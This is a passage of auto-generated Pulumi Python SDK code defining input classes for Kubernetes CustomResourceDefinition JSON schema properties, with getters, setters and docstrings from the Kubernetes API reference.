x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
"""
return pulumi.get(self, "x_kubernetes_embedded_resource")
@x_kubernetes_embedded_resource.setter
def x_kubernetes_embedded_resource(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_embedded_resource", value)
@property
@pulumi.getter
def x_kubernetes_int_or_string(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
"""
return pulumi.get(self, "x_kubernetes_int_or_string")
@x_kubernetes_int_or_string.setter
def x_kubernetes_int_or_string(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_int_or_string", value)
@property
@pulumi.getter
def x_kubernetes_list_map_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
"""
return pulumi.get(self, "x_kubernetes_list_map_keys")
@x_kubernetes_list_map_keys.setter
def x_kubernetes_list_map_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "x_kubernetes_list_map_keys", value)
@property
@pulumi.getter
def x_kubernetes_list_type(self) -> Optional[pulumi.Input[str]]:
"""
x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
"""
return pulumi.get(self, "x_kubernetes_list_type")
@x_kubernetes_list_type.setter
def x_kubernetes_list_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "x_kubernetes_list_type", value)
@property
@pulumi.getter
def x_kubernetes_map_type(self) -> Optional[pulumi.Input[str]]:
"""
x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
"""
return pulumi.get(self, "x_kubernetes_map_type")
@x_kubernetes_map_type.setter
def x_kubernetes_map_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "x_kubernetes_map_type", value)
@property
@pulumi.getter
def x_kubernetes_preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
"""
return pulumi.get(self, "x_kubernetes_preserve_unknown_fields")
@x_kubernetes_preserve_unknown_fields.setter
def x_kubernetes_preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_preserve_unknown_fields", value)
@property
@pulumi.getter
def x_kubernetes_validations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]]]:
"""
x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
return pulumi.get(self, "x_kubernetes_validations")
@x_kubernetes_validations.setter
def x_kubernetes_validations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRulePatchArgs']]]]):
pulumi.set(self, "x_kubernetes_validations", value)
@pulumi.input_type
class JSONSchemaPropsArgs:
def __init__(__self__, *,
_ref: Optional[pulumi.Input[str]] = None,
_schema: Optional[pulumi.Input[str]] = None,
additional_items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
additional_properties: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]] = None,
all_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]] = None,
any_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]] = None,
default: Optional[Any] = None,
definitions: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
dependencies: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enum: Optional[pulumi.Input[Sequence[Any]]] = None,
example: Optional[Any] = None,
exclusive_maximum: Optional[pulumi.Input[bool]] = None,
exclusive_minimum: Optional[pulumi.Input[bool]] = None,
external_docs: Optional[pulumi.Input['ExternalDocumentationArgs']] = None,
format: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
items: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]] = None,
max_items: Optional[pulumi.Input[int]] = None,
max_length: Optional[pulumi.Input[int]] = None,
max_properties: Optional[pulumi.Input[int]] = None,
maximum: Optional[pulumi.Input[float]] = None,
min_items: Optional[pulumi.Input[int]] = None,
min_length: Optional[pulumi.Input[int]] = None,
min_properties: Optional[pulumi.Input[int]] = None,
minimum: Optional[pulumi.Input[float]] = None,
multiple_of: Optional[pulumi.Input[float]] = None,
not_: Optional[pulumi.Input['JSONSchemaPropsArgs']] = None,
nullable: Optional[pulumi.Input[bool]] = None,
one_of: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]] = None,
pattern: Optional[pulumi.Input[str]] = None,
pattern_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
properties: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]] = None,
required: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
title: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
unique_items: Optional[pulumi.Input[bool]] = None,
x_kubernetes_embedded_resource: Optional[pulumi.Input[bool]] = None,
x_kubernetes_int_or_string: Optional[pulumi.Input[bool]] = None,
x_kubernetes_list_map_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
x_kubernetes_list_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_map_type: Optional[pulumi.Input[str]] = None,
x_kubernetes_preserve_unknown_fields: Optional[pulumi.Input[bool]] = None,
x_kubernetes_validations: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]]] = None):
"""
JSONSchemaProps is a JSON-Schema following Specification Draft 4 (http://json-schema.org/).
:param Any default: default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
:param pulumi.Input[str] format: format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
:param pulumi.Input[bool] x_kubernetes_embedded_resource: x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
:param pulumi.Input[bool] x_kubernetes_int_or_string: x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
:param pulumi.Input[Sequence[pulumi.Input[str]]] x_kubernetes_list_map_keys: x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
:param pulumi.Input[str] x_kubernetes_list_type: x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
:param pulumi.Input[str] x_kubernetes_map_type: x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
:param pulumi.Input[bool] x_kubernetes_preserve_unknown_fields: x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
:param pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]] x_kubernetes_validations: x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
if _ref is not None:
pulumi.set(__self__, "_ref", _ref)
if _schema is not None:
pulumi.set(__self__, "_schema", _schema)
if additional_items is not None:
pulumi.set(__self__, "additional_items", additional_items)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if all_of is not None:
pulumi.set(__self__, "all_of", all_of)
if any_of is not None:
pulumi.set(__self__, "any_of", any_of)
if default is not None:
pulumi.set(__self__, "default", default)
if definitions is not None:
pulumi.set(__self__, "definitions", definitions)
if dependencies is not None:
pulumi.set(__self__, "dependencies", dependencies)
if description is not None:
pulumi.set(__self__, "description", description)
if enum is not None:
pulumi.set(__self__, "enum", enum)
if example is not None:
pulumi.set(__self__, "example", example)
if exclusive_maximum is not None:
pulumi.set(__self__, "exclusive_maximum", exclusive_maximum)
if exclusive_minimum is not None:
pulumi.set(__self__, "exclusive_minimum", exclusive_minimum)
if external_docs is not None:
pulumi.set(__self__, "external_docs", external_docs)
if format is not None:
pulumi.set(__self__, "format", format)
if id is not None:
pulumi.set(__self__, "id", id)
if items is not None:
pulumi.set(__self__, "items", items)
if max_items is not None:
pulumi.set(__self__, "max_items", max_items)
if max_length is not None:
pulumi.set(__self__, "max_length", max_length)
if max_properties is not None:
pulumi.set(__self__, "max_properties", max_properties)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_items is not None:
pulumi.set(__self__, "min_items", min_items)
if min_length is not None:
pulumi.set(__self__, "min_length", min_length)
if min_properties is not None:
pulumi.set(__self__, "min_properties", min_properties)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if multiple_of is not None:
pulumi.set(__self__, "multiple_of", multiple_of)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if nullable is not None:
pulumi.set(__self__, "nullable", nullable)
if one_of is not None:
pulumi.set(__self__, "one_of", one_of)
if pattern is not None:
pulumi.set(__self__, "pattern", pattern)
if pattern_properties is not None:
pulumi.set(__self__, "pattern_properties", pattern_properties)
if properties is not None:
pulumi.set(__self__, "properties", properties)
if required is not None:
pulumi.set(__self__, "required", required)
if title is not None:
pulumi.set(__self__, "title", title)
if type is not None:
pulumi.set(__self__, "type", type)
if unique_items is not None:
pulumi.set(__self__, "unique_items", unique_items)
if x_kubernetes_embedded_resource is not None:
pulumi.set(__self__, "x_kubernetes_embedded_resource", x_kubernetes_embedded_resource)
if x_kubernetes_int_or_string is not None:
pulumi.set(__self__, "x_kubernetes_int_or_string", x_kubernetes_int_or_string)
if x_kubernetes_list_map_keys is not None:
pulumi.set(__self__, "x_kubernetes_list_map_keys", x_kubernetes_list_map_keys)
if x_kubernetes_list_type is not None:
pulumi.set(__self__, "x_kubernetes_list_type", x_kubernetes_list_type)
if x_kubernetes_map_type is not None:
pulumi.set(__self__, "x_kubernetes_map_type", x_kubernetes_map_type)
if x_kubernetes_preserve_unknown_fields is not None:
pulumi.set(__self__, "x_kubernetes_preserve_unknown_fields", x_kubernetes_preserve_unknown_fields)
if x_kubernetes_validations is not None:
pulumi.set(__self__, "x_kubernetes_validations", x_kubernetes_validations)
@property
@pulumi.getter(name="$ref")
def _ref(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "_ref")
@_ref.setter
def _ref(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "_ref", value)
@property
@pulumi.getter(name="$schema")
def _schema(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "_schema")
@_schema.setter
def _schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "_schema", value)
@property
@pulumi.getter(name="additionalItems")
def additional_items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
return pulumi.get(self, "additional_items")
@additional_items.setter
def additional_items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
pulumi.set(self, "additional_items", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', bool]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter(name="allOf")
def all_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "all_of")
@all_of.setter
def all_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "all_of", value)
@property
@pulumi.getter(name="anyOf")
def any_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "any_of")
@any_of.setter
def any_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "any_of", value)
@property
@pulumi.getter
def default(self) -> Optional[Any]:
"""
default is a default value for undefined object fields. Defaulting is a beta feature under the CustomResourceDefaulting feature gate. Defaulting requires spec.preserveUnknownFields to be false.
"""
return pulumi.get(self, "default")
@default.setter
def default(self, value: Optional[Any]):
pulumi.set(self, "default", value)
@property
@pulumi.getter
def definitions(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "definitions")
@definitions.setter
def definitions(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "definitions", value)
@property
@pulumi.getter
def dependencies(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]:
return pulumi.get(self, "dependencies")
@dependencies.setter
def dependencies(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[pulumi.Input[str]]]]]]]):
pulumi.set(self, "dependencies", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enum(self) -> Optional[pulumi.Input[Sequence[Any]]]:
return pulumi.get(self, "enum")
@enum.setter
def enum(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "enum", value)
@property
@pulumi.getter
def example(self) -> Optional[Any]:
return pulumi.get(self, "example")
@example.setter
def example(self, value: Optional[Any]):
pulumi.set(self, "example", value)
@property
@pulumi.getter(name="exclusiveMaximum")
def exclusive_maximum(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exclusive_maximum")
@exclusive_maximum.setter
def exclusive_maximum(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exclusive_maximum", value)
@property
@pulumi.getter(name="exclusiveMinimum")
def exclusive_minimum(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "exclusive_minimum")
@exclusive_minimum.setter
def exclusive_minimum(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exclusive_minimum", value)
@property
@pulumi.getter(name="externalDocs")
def external_docs(self) -> Optional[pulumi.Input['ExternalDocumentationArgs']]:
return pulumi.get(self, "external_docs")
@external_docs.setter
def external_docs(self, value: Optional[pulumi.Input['ExternalDocumentationArgs']]):
pulumi.set(self, "external_docs", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[str]]:
"""
format is an OpenAPI v3 format string. Unknown formats are ignored. The following formats are validated:
- bsonobjectid: a bson object ID, i.e. a 24 characters hex string - uri: an URI as parsed by Golang net/url.ParseRequestURI - email: an email address as parsed by Golang net/mail.ParseAddress - hostname: a valid representation for an Internet host name, as defined by RFC 1034, section 3.1 [RFC1034]. - ipv4: an IPv4 IP as parsed by Golang net.ParseIP - ipv6: an IPv6 IP as parsed by Golang net.ParseIP - cidr: a CIDR as parsed by Golang net.ParseCIDR - mac: a MAC address as parsed by Golang net.ParseMAC - uuid: an UUID that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid3: an UUID3 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?3[0-9a-f]{3}-?[0-9a-f]{4}-?[0-9a-f]{12}$ - uuid4: an UUID4 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?4[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - uuid5: an UUID5 that allows uppercase defined by the regex (?i)^[0-9a-f]{8}-?[0-9a-f]{4}-?5[0-9a-f]{3}-?[89ab][0-9a-f]{3}-?[0-9a-f]{12}$ - isbn: an ISBN10 or ISBN13 number string like "0321751043" or "978-0321751041" - isbn10: an ISBN10 number string like "0321751043" - isbn13: an ISBN13 number string like "978-0321751041" - creditcard: a credit card number defined by the regex ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$ with any non digit characters mixed in - ssn: a U.S. social security number following the regex ^\\d{3}[- ]?\\d{2}[- ]?\\d{4}$ - hexcolor: an hexadecimal color code like "#FFFFFF: following the regex ^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$ - rgbcolor: an RGB color code like rgb like "rgb(255,255,2559" - byte: base64 encoded binary data - password: any kind of string - date: a date string like "2006-01-02" as defined by full-date in RFC3339 - duration: a duration string like "22 ns" as parsed by Golang time.ParseDuration or compatible with Scala duration format - datetime: a date time string like "2014-12-15T19:30:20.000Z" as defined by date-time in RFC3339.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]:
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Union['JSONSchemaPropsArgs', Sequence[Any]]]]):
pulumi.set(self, "items", value)
@property
@pulumi.getter(name="maxItems")
def max_items(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_items")
@max_items.setter
def max_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_items", value)
@property
@pulumi.getter(name="maxLength")
def max_length(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_length")
@max_length.setter
def max_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_length", value)
@property
@pulumi.getter(name="maxProperties")
def max_properties(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_properties")
@max_properties.setter
def max_properties(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_properties", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minItems")
def min_items(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_items")
@min_items.setter
def min_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_items", value)
@property
@pulumi.getter(name="minLength")
def min_length(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_length")
@min_length.setter
def min_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_length", value)
@property
@pulumi.getter(name="minProperties")
def min_properties(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "min_properties")
@min_properties.setter
def min_properties(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_properties", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter(name="multipleOf")
def multiple_of(self) -> Optional[pulumi.Input[float]]:
return pulumi.get(self, "multiple_of")
@multiple_of.setter
def multiple_of(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "multiple_of", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input['JSONSchemaPropsArgs']]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input['JSONSchemaPropsArgs']]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def nullable(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "nullable")
@nullable.setter
def nullable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "nullable", value)
@property
@pulumi.getter(name="oneOf")
def one_of(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "one_of")
@one_of.setter
def one_of(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "one_of", value)
@property
@pulumi.getter
def pattern(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "pattern")
@pattern.setter
def pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pattern", value)
@property
@pulumi.getter(name="patternProperties")
def pattern_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "pattern_properties")
@pattern_properties.setter
def pattern_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "pattern_properties", value)
@property
@pulumi.getter
def properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]:
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['JSONSchemaPropsArgs']]]]):
pulumi.set(self, "properties", value)
@property
@pulumi.getter
def required(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "required")
@required.setter
def required(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "required", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="uniqueItems")
def unique_items(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "unique_items")
@unique_items.setter
def unique_items(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "unique_items", value)
@property
@pulumi.getter
def x_kubernetes_embedded_resource(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-embedded-resource defines that the value is an embedded Kubernetes runtime.Object, with TypeMeta and ObjectMeta. The type must be object. It is allowed to further restrict the embedded object. kind, apiVersion and metadata are validated automatically. x-kubernetes-preserve-unknown-fields is allowed to be true, but does not have to be if the object is fully specified (up to kind, apiVersion, metadata).
"""
return pulumi.get(self, "x_kubernetes_embedded_resource")
@x_kubernetes_embedded_resource.setter
def x_kubernetes_embedded_resource(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_embedded_resource", value)
@property
@pulumi.getter
def x_kubernetes_int_or_string(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-int-or-string specifies that this value is either an integer or a string. If this is true, an empty type is allowed and type as child of anyOf is permitted if following one of the following patterns:
1) anyOf:
- type: integer
- type: string
2) allOf:
- anyOf:
- type: integer
- type: string
- ... zero or more
"""
return pulumi.get(self, "x_kubernetes_int_or_string")
@x_kubernetes_int_or_string.setter
def x_kubernetes_int_or_string(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_int_or_string", value)
@property
@pulumi.getter
def x_kubernetes_list_map_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
x-kubernetes-list-map-keys annotates an array with the x-kubernetes-list-type `map` by specifying the keys used as the index of the map.
This tag MUST only be used on lists that have the "x-kubernetes-list-type" extension set to "map". Also, the values specified for this attribute must be a scalar typed field of the child structure (no nesting is supported).
The properties specified must either be required or have a default value, to ensure those properties are present for all list items.
"""
return pulumi.get(self, "x_kubernetes_list_map_keys")
@x_kubernetes_list_map_keys.setter
def x_kubernetes_list_map_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "x_kubernetes_list_map_keys", value)
@property
@pulumi.getter
def x_kubernetes_list_type(self) -> Optional[pulumi.Input[str]]:
"""
x-kubernetes-list-type annotates an array to further describe its topology. This extension must only be used on lists and may have 3 possible values:
1) `atomic`: the list is treated as a single entity, like a scalar.
Atomic lists will be entirely replaced when updated. This extension
may be used on any type of list (struct, scalar, ...).
2) `set`:
Sets are lists that must not have multiple items with the same value. Each
value must be a scalar, an object with x-kubernetes-map-type `atomic` or an
array with x-kubernetes-list-type `atomic`.
3) `map`:
These lists are like maps in that their elements have a non-index key
used to identify them. Order is preserved upon merge. The map tag
must only be used on a list with elements of type object.
Defaults to atomic for arrays.
"""
return pulumi.get(self, "x_kubernetes_list_type")
